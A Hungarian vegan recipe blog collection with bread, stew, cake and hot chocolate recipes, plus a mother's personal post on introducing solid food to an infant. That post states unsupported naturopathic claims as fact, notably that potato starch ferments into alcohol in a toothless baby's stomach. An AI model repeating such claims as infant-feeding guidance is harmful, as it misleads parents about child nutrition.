2014. február 17. Vegasztrománia
Ritkán járok a Mom Biopiacra, mert messzebb van, és eddig a pillanatig mindenféle prekoncepcióim voltak - annak ellenére, hogy voltam már ott. De felfedeztem két olyan helyet, ahová érdemes visszajárni szombatonként (több is van, de nekem most ez a kettő lett a szívem csücske). Ők csak szezonális zöldségeket árulnak és olyan salátaféléket, amikről eddig életemben nem hallottam. Vettem póréhagymát, csicsókát, lila káposztát, és hatféle salátát: vízitormát, tyúkhúrt - a többinek elfelejtettem a nevét, pedig tisztességgel végigkérdeztem. Sütött a nap, isteni volt.
Zöldre és főzelékre vágytam. Azt találtam ki, hogy csinálok egy kelkáposzta főzeléket csicsókával (az egyetlen zöldség, amivel még barátkozom), kicsit más ízekre hangolva. Azt kell, hogy mondjam, zseniálisan sikerült! Nagy újításom benne, hogy vegán, és kesudióval krémesítem. Telitalálat!
Alapvetően szerettem volna felismerhető részeket is hagyni benne, de ez félresikerült, az esztétikai érzékem pedig nem engedte, hogy úgy maradjon. Egy nagyon sűrű krémleves lett belőle, ami viszont arra vezetett rá, hogy a folyadék mennyiségével lehet variálni, így az alapokat felhasználva lehet belőle krémleves, főzelék, püré köretnek, vagy krém kenyérre.
Átvariált kelkáposzta főzelék
Hozzávalók: (2 adag)
1 kisebb vagy 1/2 nagy póréhagyma felkarikázva 2-3 gerezd fokhagyma apróra vágva 1 kis darab (1 1/2 - 2 cm-es) gyömbér lereszelve 4 csicsóka megpucolva, kockákra vágva 1/2 kisebb fej kelkáposzta csíkokra vágva 1/2 zöldségalaplé 3/4 csésze kesudió egy éjszakára beáztatva, lecsepegtetve só frissen őrölt fekete bors 1 kk garam masala 1 kk curry fűszerkeverék (koriander, chili, kurkuma, fahéj, római kömény, édeskömény) 1/2 lime 1-2 ek kókuszolaj (vagy más növényi zsiradék)
Felhevítettem a kókuszolajat, majd a póréhagymát, a gyömbért és 1 fokhagymát kb. 5 percig pirítottam. Hozzáadtam a csicsókát és a kelkáposztát, pirítottam együtt pár percig, majd felöntöttem az alaplével. Hozzáadtam a maradék fokhagymát, sóztam, fűszereztem. Kb. 10 perc alatt megpuhultak. Ekkor hozzáadtam a kesudiót, és botmixerrel pürésítettem (kivehetünk kelkáposztát és csicsókát, amit tálalásnál visszateszünk a tetejére). Rácsavartam a lime levét és összekevertem.
Feltétnek sárgarépás falafel golyókat és tyúkhúrt használtam, de el tudom képzelni tükörtojással is, vagy..
Félbarna toast kenyér
Bemész egy boltba vagy egy szupermarketbe és láthatod a szeletelt kenyerek végtelen hadát előre csomagolva. Kezedbe veszel egyet, elolvasod az összetevőket és elmegy a kedved attól is, hogy jó kis melegszendvicset készíts belőlük, mert látod, mennyi felesleges "cuccot" tesznek hozzá, hogy 1, tartós legyen; 2, legalább egy kicsit barnás színnel bírjon; 3, elég nagy méret jellemezze, 4, kevés pénzből elég sok készülhessen, és folytathatnám még a sort egyéb indokokkal. STOP! ELÉG! Lépjünk a tettek mezejére és készítsük el saját toast-kenyerünket, ami esetében biztosan tudjuk, milyen anyagokból készül. :)
A recept:
Hozzávalók:
- 2,7 dkg friss élesztő
- 3,3 dl meleg víz
- 20 dkg teljes kiőrlésű liszt
- 40 dkg fehér liszt (BL-55)
- 2 evőkanál olaj
- 1 dkg só
Elkészítés:
A kenyérsütő üstjébe belemorzsoljuk az élesztőt, majd ráöntjük a meleg vizet.
Sokak szerint kell hozzá valami édes dolog is. Mint például egy kiskanál méz, vagy biocsicsóka. Régen én is raktam az élesztőre mézet, vagy biocsicsókát, azonban láttam egy rövidebb filmet (Ízes hagyományok), ahol falusi asszonyok kenyeret sütve legfeljebb sót adtak az élesztőhöz és a vízhez, de cukrot semmiféleképpen nem. Azóta édesítő nélkül készítem a kenyeret.
Várunk egy rövid ideig, míg az élesztő feloldódik a víz tetejére. Ha cukrot, vagy mézet is raktunk hozzá, akkor az élesztő a víz felszínére kel. Nálam ennek hiányában csak feloldódik.
Közben elővesszük a többi hozzávalót.
Mikor feloldódott az élesztő, a fenti sorrendben hozzáadjuk a többi anyagot is.
Beletesszük a kenyérsütő gépbe és a dagasztó-kelesztő program kiválasztásával a gép elkészíti nekünk a kenyér tésztáját. Kenyérsütőgép hiánya esetén a kezünkkel kell átgyúrni, átdagasztani addig, míg a tészta elválik az edény falától és hólyagok jelennek meg a tészta felszínén a dagasztás közben.
Amikor elkészült a kenyértészta, duplájára kelesztjük meleg helyen letakarva. Majd ismét a kezünkkel kicsit átgyúrjuk és mehet a sütőpapírral bélelt kenyérsütő-formánkba. Letakarjuk megint, meleg helyen megkelesztjük, majd előmelegített sütőben 20-30 perc alatt készre sütjük. Régi gázsütőben sülnek a kenyereim, így olyan finom ropogós héjuk lesz, amit nem tudok leutánozni egy villanysütőben. Villanysütőben sütve érdemes a kenyeret sütőbe rakás előtt és a sütés befejezése előtt 10 perccel vízzel lespriccelni.
Diós-barackos almás pite
2014. február 8. Éltető ételek
Délután egy gyors édességre vágytak a gyerekek, ez lett belőle. Amíg Zsófi lereszelte az almát, addig összegyúrtam a tésztát. Ez még nem vegán, de nagyon finom. Tészta hozzávalói: - 10 dkg kukoricaliszt - 10 dkg teljes kiőrlésű tönkölyliszt - 10 dkg BL80-as liszt - 1/2 csomag sütőpor - 8 dkg méz vagy kókuszvirág cukor - 1 tojás - 9 dkg vaj - 2-3 ek. tejföl - csipet só Töltelék: - kb. 10 darab alma - citromlé - 1-2 ek. méz - fahéj - kis marék dió - kis marék aszalt barack A tészta hozzávalóiból tésztát gyúrunk, és addig betesszük a hűtőbe, amíg elkészül a töltelék. A töltelékhez az almát lereszeljük, majd kinyomkodjuk belőle a levét. Az igyuk meg nyugodtan. Ezután tegyük hozzá a diót, barackot, citromlevet és a fahéjat, majd édesítsük egy kevés mézzel. Nekem egy 25x25 cm-es jénai tálom van, amit kikentem kókuszolajjal és egy kis liszttel beszórtam. A tészta felét kinyújtottam, és beletettem a tálba. Erre jön a töltelék, majd a tészta másik fele. A széléről levágott tésztából kis csillag formákat szaggattam. Előmelegített sütőben 180 fokon kisütöttem kb. 25-30 perc alatt.
Zserbós palacsintatortácskák (vegán)
Zserbó is, palacsinta is, tortácska is. Szeretem a zserbót, az igazi, házi zserbót, de a palacsintát is. S hát mit tagadjam, a tortákat pedig végképp. Az pedig külön öröm, ha a torta egészséges.
Ennek a palacsintának az a különlegessége, hogy a tésztáját tepsiben (~20x30) sütöttem meg. 3 palacsinta "lapot" készítettem. Ez lett az alapja a zserbónak, majd az összeállított sütit szikkadás után a pohárral kiszaggattam.
A recept:
Hozzávalók:
- 15 dkg teljes kiőrlésű liszt
- 25-30 dkg fehér liszt
- ~ 9-10 dl víz
- 1 csipet só
- 8 dkg lenmag (őrölve)
- 8-10 dkg zabpehely (őrölve)
Töltelék:
- baracklekvár
- dió
- nyírfacukor/nádcukor/gyümölcscukor, stb
Máz:
- karobpor vagy kakópor
- nyírfacukor/nádcukor/gyümölcscukor, stb
- 1-2 ek kókusz zsír
- 1-2 ek víz vagy növényi tej
Elkészítés:
A palacsinta száraz hozzávalóit összekeverjük egy tálban, majd folyamatos keverés közben hozzáöntjük a vizet. Szerintem növényi tejjel vagy szénsavas vízzel is próbálkozhatunk. A zabpehely és lenmag segíti a tésztát abban, amiben máskülönben a tojás. Összekeverés után, elvileg palacsintaszerű tésztát kell kapjunk, enyhén sűrűbb lesz, mint a tojással kikevert. Ha túl sűrű, vízzel hígíthatjuk (ez esetben nem tudunk vékony tésztát sütni palacsintasütővel, és nem is biztos, hogy belül a vastag tészta át tud sülni). Ha túl folyós, keverjünk hozzá még egy kevés lisztet. Ha nem tudjuk megfordítani, mert túl "lágy",vagy leragad, akkor több a víz benne, tehát lisztet kell hozzáadni. Ha nincs gyakorlatunk abban, hogy tojásmentes palacsintát készítsünk, vagy biztosra akarunk menni a tepsiben sütésre szánt nyers palacsinta tésztával, akkor először teszteljük palacsinta sütőben, hogy jól állítottuk-e össze a tésztát.
Ez esetben a palacsinta sütőnket - remélhetőleg teflon bevonatú edény - felmelegítjük. A legelső sütéshez a biztonság kedvéért cseppenthetünk egy-két csepp olajat, vagy tehetünk bele icipici kókuszzsírt. A továbbiakhoz egyáltalán nem használok semmilyen olajat vagy zsírt. De ehhez szükséges, hogy teflon bevonatú sütővel dolgozzunk.
Miután kisültek a "teszt"palacsinták, megtöltjük őket. Majd sütőpapírral bélelt tepsiben megsütjük a palacsinta-zserbó 3 lapját, immár tepsiben, sütőben sütve. A tepsibe kb. 3 merőkanálnyit merünk a nyers, sütésre váró tésztából. Előmelegített sütőbe tesszük. Amikor tapasztaljuk, látjuk, hogy alulról átsült a tészta, a sütőpapír két végénél megfogva megfordítjuk a tepsiben a tésztát. Érdemes ekkor gyorsan egy-két csepp olajat a tepsi aljába (főként a tepsi közepébe) cseppenteni, elkenni gyorsan ecsettel, és így ráfordítani a palacsinta másik felét (ami nem sütőpapíros). Így biztos nem fog a palacsinta másik oldala leragadni. A sütőpapír ne zavarjon, azt később, mikor már mindkét oldala megsült, le tudjuk fejteni. Attól se ijedjünk meg, ha a palacsinta egy része "felhólyagosodik" a sütés során. Helyreáll a "hólyag", amint átfordítjuk a tésztát. (1 lap összesen kb. 20-30 percet sült.)
Ha elkészült a három - megközelítőleg egyforma vastagságú és nagyságú - palacsintalap, nincs más dolgunk, mint diót édesítőszerrel összeaprítani (ha daráljuk, akkor utólag édesítjük). Az első lapot megkenjük jó kis házi baracklekvárral, megszórjuk az édes dió-darálékkal. Ezt követően rátesszük a következő lapot, amivel hasonlóan járunk el, végül az utolsó palacsintalap következik, amire a "csoki"máz jön.
A csokimázat gyorsan és egyszerűen az alábbiak szerint készítjük el: A kókuszzsírt megolvasztjuk, beleszórjuk a karobport (vagy kakaóport), hozzáadunk ízlésünknek megfelelő mennyiségű édesítőt (nádcukor, nyírfacukor, stb.) Alacsony lángon forráspontig keverjük, majd pár csepp vizet is hozzáadunk. Amikor már olyan állaga van, amit a palacsinta tetején el tudunk kenni, akkor szépen elkenjük a mázt. Hűtőben dermesztjük. Ha időközben úgy látjuk, hogy még egy réteg csokimáz jól jönne a tetejére, akkor megismételjük. (Nálam jó lett volna így tenni, de egyéb okok miatt elmaradt.) A megdermedt palacsinta-zserbót felszeleteljük. Ha kör formájú sütiket szeretnénk, szorosan egymáshoz közel pohárral vagy palacsintaszaggatóval "kikorongozzuk".
UI: Valentin-nap közeledtével ugyanezt a "hadműveletet" ;) elkészíthetjük szív alakú pogácsa-szaggatóval, vagy szív alakú tortaformában megsütve a palacsinta-lapokat. (Ez esetben kevesebb tészta kell egy lap sütéséhez.)
Édesburgonyás sütőtökpüré krémes kelkáposztával
Mostanában kelkáposzta-kattanásom van....:DD Na, nem kelkáposztafőzeléket eszem, mert amiatt utáltam világ életemben a kelkáposztát!:))) Hanem kezdek ráérezni a kelkáposzta különféle különleges ízeire. És próbálgatom lelkesen!:) Ráadásul eközben azt is megtudtam, hogy magas kalcium tartalma, és egy rendkívül fontos antioxidáns zöldségféle, így ezáltal felkerült az ún. 'superfood'-ok, azaz szuper egészséges ételek közé is!:) Ráadásul most szezonja is van, úgyhogy próbáljátok ki!:) Ja, a fehér mandulakrém helyett pedig használhattok akár házi kesudiókrémet!;) Egy desszertgyűrű segítségével nagyon látványosan lehet tálalni, ezért vendégeknek is kiváló szerintem! Édesburgonyás sütőtökpüré krémes kelkáposztával Elkészítési idő: kb. 35 perc Hozzávalók (2 főre): A püréhez:600 g sütőtök 300 g édesburgonya 1 csapott tk. tengeri só 1 ek. olívaolaj 30 g fehér mandulakrém 1 késhegynyi kurkuma 1 ek. lenmagolaj A krémes káposztához: 500 g kelkáposzta 2 ek. olívaolaj 50 g fehér mandulakrém 60 g szénsavmentes ásványvíz tengeri só őrölt bors 80 g füstölt tofu 1 ek. olívaolaj tengeri só őrölt bors Melegítsük elő a sütőt 200 fokra légkeveréssel! Tisztítsuk meg a sütőtököt (hámozás, magozás), és vágjuk kockákra. Hámozzuk meg az édesburgonyát, és kockázzuk fel. Mindkettőt sózzuk, olajozzuk, és tegyük egy sütőpapírral bélelt tepsire a középső sínre, 13-18 percre. Nem szabad nagyon megpirulnia! Amikor megsült, nyomjuk át egy krumplinyomóval, és így pürésítsük. Keverjük hozzá a mandulakrémet, a kurkumát és a lenolajat. A kelkáposztáról vágjuk le a torzsát, és szeleteljük csíkokra, mossuk, szárítsuk. Melegítsük fel az olajat egy serpenyőben, és a káposztát kb. 11 percig süssük benne közepesen tűzön. A mandulakrémet keverjük el a vízzel és adjuk a káposztához. Forraljuk fel kicsit, amíg a szósz besűrűsödik, és vegyük le a tűzről. Sózzuk-borsozzuk. Vágjuk kis kockákra a tofut, melegítsük fel az olajat egy serpenyőben, és süssük benne 4 percig a tofut, majd sózzuk-borsozzuk. A pürét kanalazzuk egy desszertgyűrű feléig kb., majd rá a krémes káposztából, és a tetejét csírákkal díszíthetjük. Forrás: Attila Hildmann: Vegan for Youth
Tepertőkrémes kifli
Hamis tepertőkrémes kifli. Az bizony, hamis. Nincs benne se szalonna, se víz, se tej, nem is vasbográcsban készül, ráadásul sokkal-sokkal gyorsabban kész, mint az igazi tepertő! Ugyanolyan finom lila hagymával, sőt hasonlóan fincsi pogácsát, péksütemény-félét lehet készíteni vele. Kifliket töltöttem meg legutóbb ezzel a hamis tepertőkrémmel.
A recept:
Hozzávalók:
- 2,7 dkg friss élesztő
- 3 dl meleg víz
- 20 dkg teljes kiőrlésű búzaliszt
- 40 dkg fehér liszt (BL-55)
- 2 evőkanál olaj
- 1 dkg só
- hamis tepertőkrém
Elkészítés:
A kenyérsütő üstjébe belemorzsoljuk az élesztőt, majd ráöntjük a meleg vizet.
Sokak szerint kell hozzá valami édes dolog is. Mint például egy kiskanál méz, vagy biocsicsóka. Régen én is raktam az élesztőre mézet, vagy biocsicsókát, azonban láttam egy rövidebb filmet (Ízes hagyományok), ahol falusi asszonyok sütöttek kenyeret, és legfeljebb sót adtak az élesztőhöz és a vízhez, de cukrot semmiféleképpen nem. Azóta édesítő nélkül készítem a kenyeret.
Várunk egy rövid ideig, míg az élesztő feloldódik a víz tetejére. Ha cukrot, vagy mézet is raktunk hozzá, akkor az élesztő a víz felszínére kel. Nálam ennek hiányában csak feloldódik.
Közben elővesszük a többi hozzávalót. Mikor feloldódott az élesztő, a fenti sorrendben hozzáadjuk a többi anyagot is.
Beletesszük a kenyérsütő gépbe és kiválasztjuk azt a programot, amely képes a dagasztásra, kelesztésre. Másfél óra múlva kész a pufók "gombócunk".
A tésztát kinyújtjuk, majd háromszögekre vágjuk fel. A háromszögek közepét megkenjük hamis tepertőkrémmel a hosszabb végénél kezdjük el felcsavarni kifli formákba.
A felcsavart kifliket sütőpapíros tepsire fektetjük, pihentetjük az egészet kb. 20 percet. Sütés megkezdése előtt vízzel megkenjük őket. Kb. 20 perc közepes lángon történő sütés után ismét megkenjük vízzel. Még max. 10 percig sütjük és el is készültek a csinos és finom sós kiflik, amelyek vendégváró falatoknak, sós reggeliknek, útravaló finomságnak is alkalmasak, munkába, iskolába is csomagolhatunk belőle.
Vegán krémes, sűrű forró csoki
2014. január 31. Zizi kalandjai
És akkor az utolsó recept a februári kihívás előtt: egy fincsi, sűrű, krémes forró csoki… akik nem jönnek a kihívásra, azok készítsék el, akik pedig jönnek, azok kitűzhetik célul, hogy ez lesz a jutalmuk, ha az egy hónapot végigcsinálják. Krisztivel előre készültünk a Csokiország blogra Valentin napra (ott is lesz egy forró csoki recept, de teljesen másmilyen, szóval figyeljétek a blogot), akkor készítettük ezt az italt is.
Február 14-én jól jön egy otthoni filmnézős, romantikus estéhez egy krémes, sűrű, melengető forró csoki. Nincsen benne semmilyen tej, se tehéntej, se növényi tej… vagyis hallottam már a kesudiótejről és ennek az italnak a kesudió az alapja, beáztatott, leturmixolt változatban. Van még benne 70%-os csokoládé, nyers kakaópor, édesítve egy szem datolyával és egy kevés juharsziruppal van. A megszokott forró csokinak egy teljesen másmilyen változata, érdemes kipróbálni. A receptet itt találtam.
Vegán krémes, sűrű forró csoki
Hozzávalók kb. 4 főre:
- 1 bögre kesudió, egy éjszakára beáztatva
- 3 bögre víz
- 1/4 bögre kakaópor vagy karobpor
- 1 szem datolya, kimagozva
- 3 evőkanál juharszirup
- 50 g 70%-os étcsokoládé, felkockázva
- 1/4 teáskanál só
- 1 vaníliarúd kikapart magjai
(A recepthez használt bögre 250 ml-es.)
A beáztatott kesudió szűrjűk le és tegyük robotgépbe (vagy erős turmixgépbe). Adjuk hozzá a datolyát, a kakaóport, juharszirupot, vizet, vaníliát és sót. Turmixoljuk addig, amíg krémes, sűrű állagot érünk el.
Ekkor öntsük egy lábasba és adjuk hozzá az étcsokoládét. Melegítsük addig, amíg a csokoládé elolvad. Tálaljuk azonnal forrón.
Vegán földimogyoróvajas banánkenyér
2014. január 28. Zizi kalandjai
Csak egy gyors bejegyzés, mert van sok tennivalóm, de nem akarlak benneteket édességek nélkül hagyni, szóval, ha minden jól megy ezen a banánkenyéren kívül még jön két édes recept január végéig, aztán irány a cukormentes februári kihívás.
Van már néhány banánkenyér recept a blogon és mindegyiket imádom. Ez a földimogyoróvajas verzió azért született meg – mint a banánkenyerek többsége -, mert a hűtőben állt négy szinte feketeségig érett banán és nem volt szívem kidobni, így gyorsan cselekedtem. Mostanában ritkábban sütök, mert kevés rá az idő, de néha bevetem magam a konyhába és jól esik. Persze ez a kenyér is késő este készült és másnap délelőttig nem is ettünk belőle, amíg a fotózás meg nem történt.
A banánkenyér földimogyoróvaj páros már régóta izgatta a fantáziámat és jó, hogy kipróbáltam, mert zseniálisak együtt. Természetesen saját készítésű vajat használtam hozzá, de a boltban kapható is megfelel. Tojás helyett lenmaglisztet tettem bele és sülés során nagyon szépen meg is emelkedett, de mire kihűlt, beesett a teteje, de ez az ízén semmit nem változtatott. Mint a banánkenyerek többsége a banántól puha, omlós és ez napokig így is marad. Én extraként még a szeleteket megkentem földimogyoróvajjal, amikor ettem. Teával, kávéval kiváló reggeli vagy délutáni nasi!
Vegán földimogyoróvajas banánkenyér
Hozzávalók egy 23 cm-es formához:
- 4 db érett banán, villával pépesre törve
- 1 bögre teljeskiörlésű tönkölyliszt
- 1/2 bögre tönköly fehérliszt
- 1 teáskanál sütőpor
- 1 teáskanál szódabikarbóna
- 1/2 teáskanál fahéj
- csipet só
- 3 evőkanál lenmagliszt (őrölt lenmag)
- 6 evőkanál víz
- 1/3 bögre rizstej (szója-, mandula- és zabtej is használható)
- 1/3 bögre földimogyoróvaj
- 1/3 bögre nádcukor
- 3 evőkanál kókuszolaj
- 1 vaníliarúd kikapart magjai
- földimogyoró, felaprítva
Egy tálkában keverjük össze a lenmaglisztet a vízzel és hagyjuk állni 6-8 percig, amíg zselés állagú lesz (ez helyettesíti a tojást). Melegítsük elő a sütőt 180 fokra. A formát béleljük ki sütőpapírral.
Egy tálban keverjük össze a száraz hozzávalókat: lisztek, sütőpor, szódabikarbóna, fahéj, só. Egy másik tálban keverjük össze a nedves hozzávalókat: banánok, rizstej, földimogyoróvaj, kókuszolaj, vanília és nádcukor. Adjuk hozzá a vizes lenmagot. A nedves hozzávalókat öntsük a szárazhoz és jól keverjük el a tésztát.
Ezt öntsük bele az előkészített formába, szórjuk meg az aprított földimogyoróval, majd a 180 fokra előmelegített sütőben süssük, amíg aranybarna lesz (kb. 45-60 perc). Mielőtt kivesszük végezzünk tűpróbát, hogy a kenyér jól átsült-e.
Táplálj helyesen édesanyám!
2014. január 25. Zizi kalandjai
Bambusz tálka és kanál: innen rendeltem
Sokáig ültem ezen írás felett, elkezdtem, majd hetekig állt a szerkesztőben. Aztán, amikor majdnem kész lett, akkor gondolkodtam, hogy egyáltalán megjelentessem-e. Végül csak ráklikkeltem a “Közzététel” gombra. Szeretném jelezni, hogy ezek a saját tapasztalataim és a mások által leírt, általam elfogadott nézeteket türközik. Nem vagyunk egyformák, nyilván sokan másképp látjuk a világot. Tehát az itt leírtak nem biztos, hogy egyeznek a ti véleményetekkel. Ha csak egy információ a leírtak közül segítségetekre van, már azért megérte megjelentetni ezt az írást.
Köszönöm a megértéseteket.
————————————-
Amikor végiggondoltam, hogy miről is fogok írni ebben a bejegyzésben, akkor egyből beugrott Fűszer és Lélek, vagyis Eszter egyik korábbi bejegyzése “Kedves gravidák!”címmel. Majd olvassátok el, mert vicces. Éppen Eszter bejegyzése miatt gondolkodtam el, hogy mi legyen a bejegyzésem címe… hozzátáplálás, a kezdetek? Aztán anyukám odaadta ezt az “őskori” kis füzetet, amelynek ez a címe: Táplálj helyesen édesanyám! Mert ugye mi a legfontosabb? Az, hogy megfeleljünk a védőnőnek, a gyermekorvosnak, a szomszéd néninek vagy pedig, hogy gyermekünk egészséges, jól fejlődő és jól táplált kisbaba, gyermek legyen… aki ráadásul jókat eszik, szereti a pocakját és elégedett anyu főztjével. Gondolom, az utóbbit szeretnénk mindannyian. Persze ez nem jelenti azt, hogy ne kérjünk tanácsot, segítséget másoktól. De, kérjünk és persze olvassunk utána a témának, aztán hallgassunk az anyai megérzésünkre is, figyeljük meg, hogy mi ízlik a babának, vállaljuk fel a döntésünk felelősségét és cselekedjünk saját belátásunk szerint.
Éppen ezért jelzem, hogy az itt leírtak (saját tapasztalat) csak tájékoztató jellegűek és anyatejes babára vonatkoznak. Én például a szilárd étel után simán tudok szoptatni, Ádinak nem lesz semmi baja tőle. Egy barátnőm azt mondta, hogy ő gyümölcs után nem ad tápszert a kisfiának, mert őt meghajtja. Szóval minden baba más, szent írás pedig nem létezik (szerintem).
Ádi születése előtt tájékozódtam egy kicsit. Nem sokat tettem, csak annyit, hogy elolvastam a híres természetgyógyász Ferencsik István “Gyermekeink táplálása” című könyvét. Már évekkel ezelőtt beszereztem a könyvet antikváriumból egy barátnőm tanácsára, aztán nem is nyúltam hozzá tavalyelőtt őszig. Akkor elolvastam, aztán úgy döntöttem, hogy majd, ha a hozzátáplálásnál tartunk, akkor újra átfutom. Zseniális a könyv, de mai világunkban, amikor az ízek rabjai vagyunk, elég nehéz kivitelezni a benne leírtakat. Azt mindenképpen javaslom, hogy csak nyitott szívvel és lélekkel üljetek le a könyvet olvasni, mert Pista bácsi bíráló szavai rátok is hatással lesznek! Azonban nagyon sok hasznos információval szolgál a könyv és bizonyos dolgokat meg is tudok valósítani majd Ádi étkeztetésében.
Néhány fontos információ, amelyekkel a hozzátáplálás során találkoztam vagy tapasztaltam…
Melyik az a zöldség, amelyet leggyakrabban összekevernek más zöldséggel esetleg gyümölccsel, hogy gazdagabbá tegyék a baba ételét? Ha nincs meg a válasz, segítek. A burgonya. És mi a baj vele? Csak annyi, hogy a burgonya igen magas keményítőtartalmú táplálék és a fogak (őrlőfogak) megjelenése előtt nem lenne szabad adnunk a babáknak, ugyanis a csecsemőnek a fogak megjelenése előtt a nyálából ekkor még hiányzó ptyalin nevű fermentum miatt nem tudja a keményítőt megemészteni. Ha ezt nem tartjuk be, akkor előfordulhat, hogy a baba nyugtalan lesz, szélgörcsei lesznek, a gyomrában pedig a ptyalin hiánya miatt a keményítő megsavanyodik, majd alkohollá erjed. Ez a baba emésztőrendszerét beszennyezi és táptalajt nyújt a hurutképző és más kórokozó baktériumoknak. Egyik barátnőm jelezte is, hogy a nagyobbik kisfia ki is hányta a burgonyát (akkor ő még nem tudott erről), így nem adott neki többet egy éves koráig. Persze jöhet a kérdés, hogy akkor várjunk az őrlőfogak megjelenéséig és utána adjunk csak burgonyát? Ez olyan esetben nehezen kivitelezhető, mint a tejtesónknál, Zizinél, aki néhány napja lett egy éves és még nem bújt ki egy foga sem! Én egyelőre nem adtam burgonyát Ádinak, várok még vele néhány hónapot.
Mi alma helyett sárgarépával indítottuk a szilárd ételek bevezetését. Két hétig csak ezt ette Ádi. Utána felépítettem neki az almát, aztán jött a sütőtök, a cékla, a zeller, a petrezselyemgyökér és nemrég a paszternák. Persze a cékla a legkevésbé nyerő, de ha keverve van répával és például almával, akkor simán megeszi. Az új szerelem a sütőtök paszternák kombó! Nekem is nagyon bejön… még az is lehet, hogy megihlet egy receptre! A Jolly Joker persze az alma. A biopiacon ismerkedtünk meg a Florina almával, ez elég édes, éppen emiatt baba almának is hívják, vagyis ezt javasolják babáknak. Persze Ádinak is nagyon bejött, imádja!
Igyekszem a szezonalitásra figyelni a saját étkezésünkben, így Ádi étkezésében is, vagyis egyelőre kerülöm a déli gyümölcsöket és olyanokat adok csak, amelyek itt Magyarországon jelenleg szezonálisak. A banánról érdemes tudni, hogy a legjobban permetezett gyümölcs a világon. Én emiatt hanyagolom a banánt… Ádi úgyis fog eleget enni életében, most nem akarom még a szervezetét ezzel szennyezni (mármint a permetszerekkel). A fentebb említett őskori füzet a következőt írja: “Narancs, mandarin , grapefruit: levüket adhatjuk 3-4 hetes csecsemőnek. Eleinte teában, feles hígításban, cukorral édesítve.” (!!!) – No comment!
Van még a füzetben egy-két hajtépő gondolat, azonban találtam hasznos információt is, mégpedig, hogy az étkezés megkezdése előtt pár kedves szóval mondjuk meg a babának, hogy mit kap enni, mutassuk meg neki az ételt, keltsük fel az érdeklődését és játékkal, énekkel ne vonjuk el a figyelmét az evéstől. Én már volt, hogy énekléssel hívtam fel magamra a figyelmet… , szóval nem elvontam a figyelmét, hanem inkább magamra és az evésre irányítottam, de persze ez elsülhet fordítva is.
Az ételtársításoknál figyelembe veszem Gitta tanácsát, mely szerint a gyümölcsöket nem igazán jó keverni sem egymással, sem zöldségekkel. Ez alól egyetlen kivétel az alma: akár más gyümölcsökkel, akár zöldségekkel lehet párosítani, nem fog emésztési problémát okozni. Ez akkor lesz fontos, ha Ádi többféle gyümölcsöt is fog enni.
Az almát nyersen adom, a zöldségeket pedig az esetek többségében tepsiben egy kevés vízzel felöntve megsütöm. Nagyon finom, édes marad az ízük. Általában 2 napra elegendő adagot készítek el, utána frisset sütök.
A kezdetek
Ádi 6 hónapos és 1 napos volt, amikor először kapott szilárd ételt.
A gyermekorvosunk tanácsára így építettük fel a répát, majd hozzá az almát (nekünk nagyon bevált ez a módszer). Természetesen a szilárd étel bevezetése mellett a napi többszöri szoptatás megmaradt.
1. nap – 1 adagolókanál répapüré ebéd + utána szoptatás
2. nap – 3 adagolókanál répapüré ebéd + utána szoptatás
3. nap – 20 ml répapüré ebéd + utána szoptatás
4. nap – 50 ml répapüré ebéd + utána szoptatás
5. nap – 100 ml répapüré ebéd + utána szoptatás
6. nap – 100 ml répapüré ebéd + utána szoptatás és 100 ml répapüré vacsora + utána szoptatás
7-14. nap – 100 ml répapüré ebéd + utána szoptatás és 100 ml répapüré vacsora + utána szoptatás
15. nap – 1 adagolókanál almapüré délelőtt tízóraira + utána szoptatás és 100 ml répapüré ebéd + utána szoptatás és 100 ml répapüré vacsora + utána szoptatás
16. nap – 3 adagolókanál almapüré délelőtt tízóraira + utána szoptatás és 100 ml répapüré ebéd + utána szoptatás és 100 ml répapüré vacsora + utána szoptatás
17. nap – 20 ml almapüré délelőtt tízóraira + utána szoptatás és 100 ml répapüré ebéd + utána szoptatás és 100 ml répapüré vacsora + utána szoptatás
18. nap – 50 ml almapüré délelőtt tízóraira + utána szoptatás és 100 ml répapüré ebéd + utána szoptatás és 100 ml répapüré vacsora + utána szoptatás
19. nap – 100 ml almapüré délelőtt tízóraira + utána szoptatás és 100 ml répapüré ebéd + utána szoptatás és 100 ml répapüré vacsora + utána szoptatás
20. nap – 100 ml almapüré délelőtt tízóraira + utána szoptatás és 100 ml répapüré ebéd + utána szoptatás és 100 ml almapüré délután uzsonnára + szoptatás és 100 ml répapüré vacsora + utána szoptatás
21. nap – innentől legalább egy hétig napi 4 * 100 ml szilárd étel: egyik gyümölcs, egyik zöldség
Ezután kezdtük a répát leépíteni, a sütőtököt pedig felépíteni. Másfél hónap eltelte után már nem voltam túlságosan kemény és lazítottam a dolgon, tehát a céklát, paszternákot és a többi újdonságot, csak simán beépítettem Ádi étrendjébe. Ha láttam, hogy nem ízlik neki, akkor hanyagoltam néhány napig az adott zöldséget, majd újra elővettem és kevertem más zöldségekkel vagy almával.
Folyadék
Az anyatejen kívül Ádi eddig csak vizet ivott. Gyümölcslevet és teát sem adtam még neki. Több barátnőm is mesélte, hogy ők is csak vizet adtak és később a gyerekek csak a vizet fogadták el, a gyümölcslére sem voltak nyitottak nagyon (nyilván minél több ételt/italt megkóstolnak, ez annál inkább változni fog).
Ha kevesebbet fog Ádi szopizni, akkor növelni fogom a víz mennyiségét és bevezetem majd a növényi tejeket. Terveim szerint rizstejjel és mandulatejjel fogok próbálkozni, a tehéntejet hanyagolom.
Bolti bébiételek
Résen kell lenni és kötelező címkét olvasni! Teljesen ledöbbentem például az egyik cég vacsorára, lefekvés előtt ajánlott bébiételeitől. Van olyan, amelyikben van kakaó (koffeintartalom!!!) és cukor (ami felpörgeti a gyereket!!!). Vannak bio, csak zöldséget, csak gyümölcsöt és mondjuk vizet tartalmazó bébiételek. Egyszer piacoztunk, elcsúsztunk az idővel és sokára értünk volna haza, így vettünk bio répapürét és sütőtökpürét. Persze én is megkóstoltam és a sütőtöknek egyáltalán nem volt sütőtök íze, csak egyszerű pépesített zöldség íze. Amit én sütök a sütőben, az jó édes, össze sem hasonlítható a boltival!
————————————
Egyelőre itt tartunk majdnem 9 hónaposan. Ha kíváncsiak vagytok a folytatásra, akkor majd a továbbiakról is írok beszámolót!
Gesztenyés kukoricakása-torta datolyasziruppal
2014. január 24. Mindennapi ételeink
